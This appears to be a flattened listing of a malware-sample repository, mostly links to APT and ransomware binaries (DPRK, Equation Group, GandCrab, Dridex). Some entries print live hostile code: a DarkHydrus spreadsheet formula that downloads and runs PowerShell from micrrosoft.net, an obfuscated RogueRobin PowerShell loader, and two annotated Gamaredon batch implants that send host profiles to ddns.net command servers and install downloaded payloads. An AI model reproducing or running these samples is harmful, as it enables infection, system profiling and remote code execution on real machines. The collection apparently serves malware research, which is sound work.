https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/HiddenCobra.exe -------------------------------------------------------------------------------- /DPRK/HiddenCobraJoanap.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/HiddenCobraJoanap.bin -------------------------------------------------------------------------------- /DPRK/MoneroNorthKoreaPyongynag.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/MoneroNorthKoreaPyongynag.bin -------------------------------------------------------------------------------- /DPRK/North Korea NavRat June 2018/Application.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/North Korea NavRat June 2018/Application.bin -------------------------------------------------------------------------------- /DPRK/North Korea NavRat June 2018/DLL#1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/North Korea NavRat June 2018/DLL#1.bin -------------------------------------------------------------------------------- /DPRK/North Korea NavRat June 2018/DLL#2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/North Korea NavRat June 2018/DLL#2.bin -------------------------------------------------------------------------------- /DPRK/RedDawnSunTeamAndroid.apk: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/RedDawnSunTeamAndroid.apk -------------------------------------------------------------------------------- /DPRK/SunTeamAndroid.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/SunTeamAndroid.apk -------------------------------------------------------------------------------- /DPRK/SunTeamRedDawn.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/SunTeamRedDawn.apk -------------------------------------------------------------------------------- /DarkHydrus/DarkHydrus.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DarkHydrus/DarkHydrus.bin -------------------------------------------------------------------------------- /DarkHydrus/DarkHydrusImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DarkHydrus/DarkHydrusImplant.bin -------------------------------------------------------------------------------- /DarkHydrus/DarkHydrusInfo.txt: -------------------------------------------------------------------------------- 1 | https://researchcenter.paloaltonetworks.com/2018/08/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east/ -------------------------------------------------------------------------------- /DarkHydrus/DarkHydrusPayload.bin: -------------------------------------------------------------------------------- 1 | 
http://micrrosoft.net/releasenotes.txt 2 | 3 | -------------------------------------------------------------------------------- /DarkHydrus/DarkHydrusPowershellScript.bin: -------------------------------------------------------------------------------- 1 | =cmd|' /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c IEX ((New-Object Net.WebClient).DownloadString(\"http://micrrosoft.net/winupdate.ps1\"))'!A0 -------------------------------------------------------------------------------- /DarkHydrus/RogueRobinPowershellPayloadObfuscated.bin: -------------------------------------------------------------------------------- 1 | (nEw-oBJEcT io.coMPreSSIOn.DEfLatEStreAM([IO.mEMoRYsTrEAm][SysTEM.CoNVErt]::fROmbaSe64stRInG( "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") ,[sYStEm.IO.coMPrEsSiON.coMpREsSIoNMOdE]::DECOmpresS)|% {nEw-oBJEcT syStEm.Io.STreamREAdeR($_ , [sysTeM.TeXt.enCoDiNg]::AscII) }| %{ $_.readTOEnD( )} )| . ( $SheLlID[1]+$sHelliD[13]+"X") 2>&1 | out-null -------------------------------------------------------------------------------- /DarkTequila/DarkTequila.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DarkTequila/DarkTequila.exe -------------------------------------------------------------------------------- /DoquAPT/DoquDropper.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DoquAPT/DoquDropper.bin -------------------------------------------------------------------------------- /Dridex/Dridex2ndstage.exe.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Dridex/Dridex2ndstage.exe.bin 
-------------------------------------------------------------------------------- /Dridex/DridexDDEDropperdoc.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Dridex/DridexDDEDropperdoc.bin -------------------------------------------------------------------------------- /Dridex/DridexInformation.txt: -------------------------------------------------------------------------------- 1 | https://www.webopedia.com/TERM/D/dridex-malware.html -------------------------------------------------------------------------------- /Dridex/DridexbankerPacked.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Dridex/DridexbankerPacked.bin -------------------------------------------------------------------------------- /Dridex/dridexDroppedVBS.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Dridex/dridexDroppedVBS.bin -------------------------------------------------------------------------------- /Dridex/dridexLoader.bin.exe.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Dridex/dridexLoader.bin.exe.bin -------------------------------------------------------------------------------- /Dridex/dridexbanker.false: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Dridex/dridexbanker.false -------------------------------------------------------------------------------- /Dridex/dridexbankerzip.zip: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Dridex/dridexbankerzip.zip -------------------------------------------------------------------------------- /DustSquad/DustSquadInformation.txt: -------------------------------------------------------------------------------- 1 | https://securelist.com/octopus-infested-seas-of-central-asia/88200/ -------------------------------------------------------------------------------- /DustSquad/OctopusDelphi.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DustSquad/OctopusDelphi.exe -------------------------------------------------------------------------------- /DustSquad/OctopusTelegramMessengerDropper.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DustSquad/OctopusTelegramMessengerDropper.bin -------------------------------------------------------------------------------- /Emotet/EmotetInvoiceDoc.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Emotet/EmotetInvoiceDoc.bin -------------------------------------------------------------------------------- /EnergeticBear/BerserkBear Downloader.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EnergeticBear/BerserkBear Downloader.bin -------------------------------------------------------------------------------- /EnergeticBear/Energetic Bear Implant: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EnergeticBear/Energetic Bear Implant -------------------------------------------------------------------------------- /EnergeticBear/Temp.IsotopeImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EnergeticBear/Temp.IsotopeImplant.bin -------------------------------------------------------------------------------- /EquationGroup/DiskFromHoustonEoPExploits.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/DiskFromHoustonEoPExploits.bin -------------------------------------------------------------------------------- /EquationGroup/DoubleFantasyInstaller.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/DoubleFantasyInstaller.bin -------------------------------------------------------------------------------- /EquationGroup/EquationDrugLUTEUSOBSTOS: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/EquationDrugLUTEUSOBSTOS -------------------------------------------------------------------------------- /EquationGroup/EquationGroupInfo.txt: -------------------------------------------------------------------------------- 1 | https://cdn1.vox-cdn.com/uploads/chorus_asset/file/3415904/Equation_group_questions_and_answers.0.pdf -------------------------------------------------------------------------------- 
/EquationGroup/EquationLaserInstaller.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/EquationLaserInstaller.bin -------------------------------------------------------------------------------- /EquationGroup/FannyWorm.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/FannyWorm.bin -------------------------------------------------------------------------------- /EquationGroup/GrayfishInstaller.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/GrayfishInstaller.bin -------------------------------------------------------------------------------- /EquationGroup/GrokKeylogger: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/GrokKeylogger -------------------------------------------------------------------------------- /EquationGroup/HDDFirmware: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/HDDFirmware -------------------------------------------------------------------------------- /EquationGroup/SD_IP_CF.dll.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/SD_IP_CF.dll.bin -------------------------------------------------------------------------------- /EquationGroup/TripleFantasy.bin: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/TripleFantasy.bin -------------------------------------------------------------------------------- /GamaredonGroup/GamaredonGroupINFO.txt: -------------------------------------------------------------------------------- 1 | https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/ 2 | -------------------------------------------------------------------------------- /GamaredonGroup/GamaredonImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GamaredonGroup/GamaredonImplant.bin -------------------------------------------------------------------------------- /GamaredonGroup/Pteranodon.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GamaredonGroup/Pteranodon.bin -------------------------------------------------------------------------------- /GamaredonGroup/Pteranodon2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GamaredonGroup/Pteranodon2.bin -------------------------------------------------------------------------------- /GamaredonGroup/Pteranodon3.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GamaredonGroup/Pteranodon3.bin -------------------------------------------------------------------------------- /GamaredonGroup/Pteranodon4.bin: 
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GamaredonGroup/Pteranodon4.bin
--------------------------------------------------------------------------------
/GamaredonGroup/Pteranodon5.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GamaredonGroup/Pteranodon5.bin
--------------------------------------------------------------------------------
/GamaredonGroup/Pteranodon6.bin:
--------------------------------------------------------------------------------
   | REM Analyst notes (unnumbered REM lines) are annotations; numbered lines are the sample as listed.
   | REM Flow: profile the host, POST the profile to an HTTP endpoint, decrypt the response with a
   | REM bundled helper, and if the result passes a string check, install and start it as
   | REM %APPDATA%\Microsoft\Crypto\keys\cryptcp.exe.
   | REM Filler: the repeated "set NKALnvo=", "set emwAzZN=" and "set FqJUL=" assignments and the two
   | REM "if ... set" lines (%USERPROFILE%==jghjvKB, jolPPmX==HOKFFGC) write values that nothing in
   | REM this listing reads; the second compares two different literals and can never be true.
   | REM Presumably padding against signature matching - skip them when following the logic.
1 | @echo off
2 | set NKALnvo=%random%
   | REM Switches the console to code page 1251 (Windows Cyrillic).
3 | chcp 1251 >NUL
4 | set emwAzZN=%APPDATA%
   | REM Delayed expansion is needed for the !infosys! accumulation on line 41.
5 | setlocal enableextensions enabledelayedexpansion
6 | if %USERPROFILE%==jghjvKB set JnLpYQU=%COMPUTERNAME%
7 | :DndlL
8 | set emwAzZN=%APPDATA%
   | REM Version string reported to the server in the "versiya" POST field (line 72).
9 | set vers=V.309
10 | set emwAzZN=%APPDATA%
   | REM File name the HTTP response is saved under (-O on line 72).
11 | set xfDkC=FAdeF
12 | set emwAzZN=%APPDATA%
   | REM Install directory for the payload; sits under the per-user Microsoft\Crypto tree,
   | REM presumably to blend in with legitimate key-store folders.
13 | set IRVoo=%APPDATA%\Microsoft\Crypto\keys
14 | set NKALnvo=%random%
   | REM User-Agent sent on line 72: an Android Chrome string, although the script itself uses
   | REM Windows-only commands - a mismatch worth keying on in proxy logs.
15 | set RwukB="Mozilla/5.0 (Linux; Android 6.0.1; SM-A500H Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Mobile Safari/537.36"
16 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo
17 | set FqJUL=*.*
18 | set emwAzZN=%APPDATA%
   | REM Base name of the installed payload process (cryptcp.exe).
19 | set BwUVL=cryptcp
20 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo
   | REM Instance guard: counts running cryptcp.exe processes and jumps to "exit" when there are
   | REM two or more. No :exit label appears in this listing; cmd stops a batch file when a goto
   | REM target is missing, so the effect is presumably termination.
21 | for /f %%n in ('
22 | tasklist /nh /fi "imagename eq %BwUVL%.exe" ^| find /c "%BwUVL%.exe"
23 | ') do set /a zocrI=%%n
24 | if %zocrI% geq 2 goto exit
25 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo
26 | set NKALnvo=%random%
   | REM Reads the C: volume serial number from "vol c:" (second output line, 4th token); when
   | REM that token is the word "is" the 5th token is taken instead - presumably to cope with
   | REM differently worded vol output.
27 | set tGFFD='vol c:'
28 | set NKALnvo=%random%
29 | For /F "skip=1 Tokens=4*" %%o In (%tGFFD%) Do set JnjRi=%%o
30 | if %JnjRi%==is (
31 | For /F "skip=1 Tokens=5*" %%n In (%tGFFD%) Do set JnjRi=%%n
32 | )
33 | if %USERPROFILE%==jghjvKB set JnLpYQU=%COMPUTERNAME%
34 | set emwAzZN=%APPDATA%
   | REM Host identifier: <computer name>_<serial with dashes removed>, then spaces stripped (line 37).
35 | set DWiYe=%computername%_%JnjRi:-=%
36 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo
37 | set DWiYe=%DWiYe: =%
38 | set NKALnvo=%random%
   | REM Writes systeminfo output to a file named IrJHg in the current directory, then joins every
   | REM non-empty line into %infosys% with "+###" as the separator. The file is deleted on line 49.
39 | systeminfo>IrJHg
40 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo
41 | FOR /F "tokens=*" %%o IN (IrJHg) do @IF NOT j%%o==j set infosys=!infosys!%%o+###
42 | set emwAzZN=%APPDATA%
   | REM Renames two companion binaries that must already be in the working directory (neither is
   | REM part of this listing): OfficeModule.exe becomes the HTTP client used on line 72 and
   | REM Crypt.exe becomes the decryptor used on line 74.
43 | RENAME "OfficeModule.exe" FAdeF.exe
44 | set NKALnvo=%random%
45 | set UQBIN=FAdeF.exe
46 | if %USERPROFILE%==jghjvKB set JnLpYQU=%COMPUTERNAME%
47 | RENAME "%CD%\Crypt.exe" file_QIPJV.exe
48 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo
49 | del /f /q "IrJHg"
   | REM Main loop: sleep a random 0-89 seconds, then test connectivity by pinging 8.8.8.8 and
   | REM looking for "TTL=" in the reply. Online -> :FAdeF (check-in); offline -> :QIPJV (back-off).
50 | :UfjsJ
51 | set NKALnvo=%random%
52 | set /a dWFzF=90*%RANDOM%/32768
53 | if %USERPROFILE%==jghjvKB set JnLpYQU=%COMPUTERNAME%
54 | timeout /t %dWFzF%
55 | if %USERPROFILE%==jghjvKB set JnLpYQU=%COMPUTERNAME%
56 | set NKALnvo=%random%
57 | ping 8.8.8.8 |>nul find /i "TTL=" &&goto FAdeF||goto QIPJV
58 | if %USERPROFILE%==jghjvKB set JnLpYQU=%COMPUTERNAME%
59 | :FAdeF
60 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo
   | REM Kills any still-running instance of the HTTP client before starting a new request.
61 | tasklist /fi "IMAGENAME eq %UQBIN%" | find /i "%UQBIN%"
62 | if not errorlevel 1 taskkill /f /im %UQBIN%
63 | set NKALnvo=%random%
   | REM The endpoint is assembled from three fragments (lines 64-70), which keeps the full URL
   | REM out of any single string: hxxp://spr-updates[.]ddns[.]net/spr_updates.php
64 | set SPUHA=spr-updates
65 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo
66 | set dXlsp=ddns.net
67 | set emwAzZN=%APPDATA%
68 | set RWGVi=spr_updates.php
69 | set NKALnvo=%random%
70 | set ZrFBB=http://%SPUHA%.%dXlsp%/%RWGVi%
71 | set emwAzZN=%APPDATA%
   | REM Check-in: POSTs the fields sysinfo, id, fid, comp and versiya and saves the response as
   | REM FAdeF. The option syntax (-t, --user-agent, --post-data, -q, -N, -O) resembles GNU Wget;
   | REM presumably the renamed binary is a wget build - confirm against the sample.
72 | %UQBIN% -t 5 --user-agent=%RwukB% --post-data="sysinfo=%infosys%&id=%DWiYe%&fid=000000&comp=%computername%&versiya=%vers%" "%ZrFBB%" -q -N %ZrFBB% -O %xfDkC%
73 | set NKALnvo=%random%
   | REM Runs the renamed Crypt.exe over the response with the argument "dec" and a hard-coded
   | REM passphrase. Line 78 reads dec_FAdeF, so the helper presumably writes its output with a
   | REM dec_ prefix.
74 | file_QIPJV.exe "%xfDkC%" dec "gjghj,eqhfcgfreqgbyljc"
75 | set emwAzZN=%APPDATA%
76 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo
77 | set NKALnvo=%random%
   | REM Install step, taken only when the decrypted file contains the string ".rdata" (a common
   | REM PE section name, so presumably a cheap "is this an executable" test): kill the running
   | REM cryptcp.exe, rename the old copy to DndlL, copy the new file into the install directory as
   | REM cryptcp.exe, start it, wait 0-5 seconds and exit this script.
78 | 1>nul findstr "\<.rdata\>" dec_%xfDkC% && (
79 | taskkill /f /im %BwUVL%.exe
80 | RENAME "%IRVoo%\%BwUVL%.exe" DndlL
81 | copy /y /v "%CD%\dec_%xfDkC%" "%IRVoo%\%BwUVL%.exe"
82 | start "" "%IRVoo%\%BwUVL%.exe"
83 | set /a dWFzF=6*%RANDOM%/32768
84 | timeout /t %dWFzF%
85 | exit
86 | )
87 |
88 | set NKALnvo=%random%
89 | set NKALnvo=%random%
   | REM Back-off: sleep a random 0-59 seconds, then return to the main loop.
90 | :QIPJV
91 | set emwAzZN=%APPDATA%
92 | set /a dWFzF=60*%RANDOM%/32768
93 | set NKALnvo=%random%
94 | timeout /T %dWFzF%
95 | set NKALnvo=%random%
96 | set NKALnvo=%random%
97 | goto UfjsJ
98 |
--------------------------------------------------------------------------------
/GamaredonGroup/PteranodonImplant.bin:
--------------------------------------------------------------------------------
   | REM Analyst notes (unnumbered REM lines) are annotations; numbered lines are the sample as listed.
   | REM Flow: profile the host, POST the profile to an HTTP endpoint in a loop, and when the
   | REM response is larger than 60000 bytes hand it to a second script (updates.cmd, not part of
   | REM this listing). No decryption or install step is visible here.
   | REM Filler: the repeated "set VBOqEBf=", "set pIcDFiG=", "set sBHIipk=" assignments and the
   | REM "if %USERPROFILE%==bUDFniN" lines write values that nothing in this listing reads;
   | REM presumably padding against signature matching.
1 | @echo off
2 | set VBOqEBf=%systemroot%
   | REM Delayed expansion is needed for the !infosys! accumulation on line 41.
3 | setlocal ENABLEDELAYEDEXPANSION
4 | if %USERPROFILE%==bUDFniN set MCoRBRj=%COMPUTERNAME%
5 | set VBOqEBf=%APPDATA%
   | REM Version string reported to the server in the "versiya" POST field (line 60).
6 | set vers=V.74
7 | set VBOqEBf=%APPDATA%
   | REM File name the HTTP response is saved under (-O on line 60).
8 | set XIDIo=ByxoX
9 | set VBOqEBf=%APPDATA%
   | REM Target directory passed to the second script on line 75; switched to a %WINDIR% path
   | REM when the output of "ver" contains "XP" (lines 15-18).
10 | set eomKN=%APPDATA%\Microsoft\Crypto\RSA
11 | set pIcDFiG=%DATE%
12 | set sBHIipk=%random%
13 | set kbDRK=XP
14 | if %USERPROFILE%==bUDFniN set MCoRBRj=%COMPUTERNAME%
15 | ver | find /i "%kbDRK%"
16 | if %errorlevel% == 0 (
17 | set eomKN=%WINDIR%\Microsoft\Crypto\RSA
18 | )
19 | set VBOqEBf=%APPDATA%
   | REM Base name of the payload process that the instance guard below looks for (cryptcp.exe).
20 | set VJakY=cryptcp
21 | set sBHIipk=%random%
   | REM Instance guard: counts running cryptcp.exe processes and jumps to "exit" when there are
   | REM two or more. No :exit label appears in this listing; cmd stops a batch file when a goto
   | REM target is missing, so the effect is presumably termination.
22 | for /f %%a in ('
23 | tasklist /nh /fi "imagename eq %VJakY%.exe" ^| find /c "%VJakY%.exe"
24 | ') do set /a DbeHN=%%a
25 | if %DbeHN% geq 2 goto exit
26 | set sBHIipk=%random%
27 | set pIcDFiG=%DATE%
   | REM Reads the C: volume serial number from "vol c:" (second output line, 4th token, or the
   | REM 5th when the 4th is the word "is").
28 | For /F "skip=1 Tokens=4*" %%n In ('vol c:') Do set tqDlR=%%n
29 | if %tqDlR%==is (
30 | For /F "skip=1 Tokens=5*" %%m In ('vol c:') Do set tqDlR=%%m
31 | )
32 | if %USERPROFILE%==bUDFniN set MCoRBRj=%COMPUTERNAME%
33 | set VBOqEBf=%systemroot%
34 | set VBOqEBf=%APPDATA%
   | REM Host identifier: <computer name>_<serial with dashes removed>, then spaces stripped (line 37).
35 | set cGvFw=%computername%_%tqDlR:-=%
36 | set sBHIipk=%random%
37 | set cGvFw=%cGvFw: =%
38 | set pIcDFiG=%DATE%
   | REM Writes systeminfo output to a file named paGYd in the current directory and joins every
   | REM non-empty line into %infosys% with "+###" as the separator. No del of paGYd is visible
   | REM in this listing, so the file presumably stays on disk as an artifact.
39 | systeminfo>paGYd
40 | set sBHIipk=%random%
41 | FOR /F "tokens=*" %%f IN (paGYd) do @IF NOT Z%%f==Z set infosys=!infosys!%%f+###
42 | set VBOqEBf=%APPDATA%
43 |
   | REM Main loop: sleep a random 0-49 seconds, kill any running OfficeModule.exe, then check in.
   | REM OfficeModule.exe must already be in the working directory; it is not part of this listing.
44 | :cpSwS
45 | set cqhUZ=OfficeModule.exe
46 | set /a IHNAx=50*%RANDOM%/32768
47 | if %USERPROFILE%==bUDFniN set MCoRBRj=%COMPUTERNAME%
48 | timeout /t %IHNAx%
49 | set VBOqEBf=%systemroot%
50 | tasklist /fi "IMAGENAME eq %cqhUZ%" | find /i "%cqhUZ%"
51 | if not errorlevel 1 taskkill /f /im %cqhUZ%
52 | set pIcDFiG=%DATE%
   | REM The endpoint is assembled from three fragments (lines 53-58):
   | REM hxxp://drop-news[.]ddns[.]net/updates.php
53 | set HdCPw=drop-news
54 | set aKdiH=ddns.net
55 | set VBOqEBf=%APPDATA%
56 | set RyJIc=updates.php
57 | set pIcDFiG=%DATE%
58 | set BHvhl=http://%HdCPw%.%aKdiH%/%RyJIc%
59 | set VBOqEBf=%APPDATA%
   | REM Check-in, started in the background: POSTs the fields versiya, comp, id, sysinfo and fid
   | REM and saves the response as ByxoX. The option syntax (--post-data, -q, -N, -O) resembles
   | REM GNU Wget; presumably OfficeModule.exe is a wget build - confirm against the sample.
   | REM The client is given 10 seconds and is then killed if still running (lines 61-64).
60 | start /b %cqhUZ% --post-data="versiya=%vers%&comp=%computername%&id=%cGvFw%&sysinfo=%infosys%&fid=000000" "%BHvhl%" -q -N %BHvhl% -O %XIDIo%
61 | timeout /T 10
62 |
63 | tasklist /fi "IMAGENAME eq %cqhUZ%" | find /i "%cqhUZ%"
64 | if not errorlevel 1 taskkill /f /im %cqhUZ%
65 |
   | REM Size gate: %%~Zt appears to expand to the size in bytes of the saved response; at or
   | REM below 60000 the response is ignored and the loop sleeps again (:OIGDj).
66 | for %%t in (%XIDIo%) do (set /a OUkkY=%%~Zt)
67 | if %OUkkY% LEQ 60000 goto OIGDj
68 |
   | REM Hand-off: renames the response to cryptcp.tmp, renames updates.cmd to OIGDj.cmd and calls
   | REM it with the delay, the target directory, the payload base name and the download name.
   | REM What that script does is not visible here. NOTE(review): "timeout /2" on line 72 has no
   | REM /t switch and looks malformed, so it presumably fails without waiting.
69 | :ByxoX
70 | set pIcDFiG=%DATE%
71 | RENAME "%XIDIo%" %VJakY%.tmp
72 | timeout /2
73 | RENAME "updates.cmd" OIGDj.cmd
74 | set VBOqEBf=%APPDATA%
75 | call OIGDj.cmd %IHNAx% %eomKN% %VJakY% %XIDIo%
76 | set VBOqEBf=%systemroot%
   | REM Back-off: sleep for the same random delay chosen on line 46, then return to the main loop.
77 | :OIGDj
78 | set VBOqEBf=%APPDATA%
79 | timeout /T %IHNAx%
80 | set VBOqEBf=%systemroot%
81 | goto cpSwS
82 |
--------------------------------------------------------------------------------
/GamaredonGroup/PteranodonImplant7.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GamaredonGroup/PteranodonImplant7.bin
--------------------------------------------------------------------------------
/GamaredonGroup/photoshopimplant.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GamaredonGroup/photoshopimplant.bin
--------------------------------------------------------------------------------
/GandCrab/GandCrab v5.1(Include Decrypt Tools).zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/GandCrab v5.1(Include Decrypt Tools).zip -------------------------------------------------------------------------------- /GandCrab/GandCrabV5.0.4.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/GandCrabV5.0.4.exe -------------------------------------------------------------------------------- /GandCrab/GandCrabVariant.false: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/GandCrabVariant.false -------------------------------------------------------------------------------- /GandCrab/GandCrabv4.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/GandCrabv4.exe -------------------------------------------------------------------------------- /GandCrab/GandCrabv5RandomExtension.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/GandCrabv5RandomExtension.bin -------------------------------------------------------------------------------- /GandCrab/Gandcrab5.0.2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/Gandcrab5.0.2.bin -------------------------------------------------------------------------------- /GandCrab/Gandcrab5.0.3.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/Gandcrab5.0.3.exe -------------------------------------------------------------------------------- /GandCrab/GandcrabV5.0.5.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/GandcrabV5.0.5.bin -------------------------------------------------------------------------------- /GandCrab/Gandcrabv5.0.2exe.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/Gandcrabv5.0.2exe.bin -------------------------------------------------------------------------------- /GazaAPTGroup/GazaGroupImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GazaAPTGroup/GazaGroupImplant.bin -------------------------------------------------------------------------------- /GazaAPTGroup/GazaGroupInfo.txt: -------------------------------------------------------------------------------- 1 | https://medium.com/@CywareSTIX/the-big-bang-attack-campaign-gaza-hackers-suspected-of-targeting-middle-eastern-victims-ca2e8c91c69b 2 | -------------------------------------------------------------------------------- /GazaAPTGroup/ImplantBigBang.bin: -------------------------------------------------------------------------------- 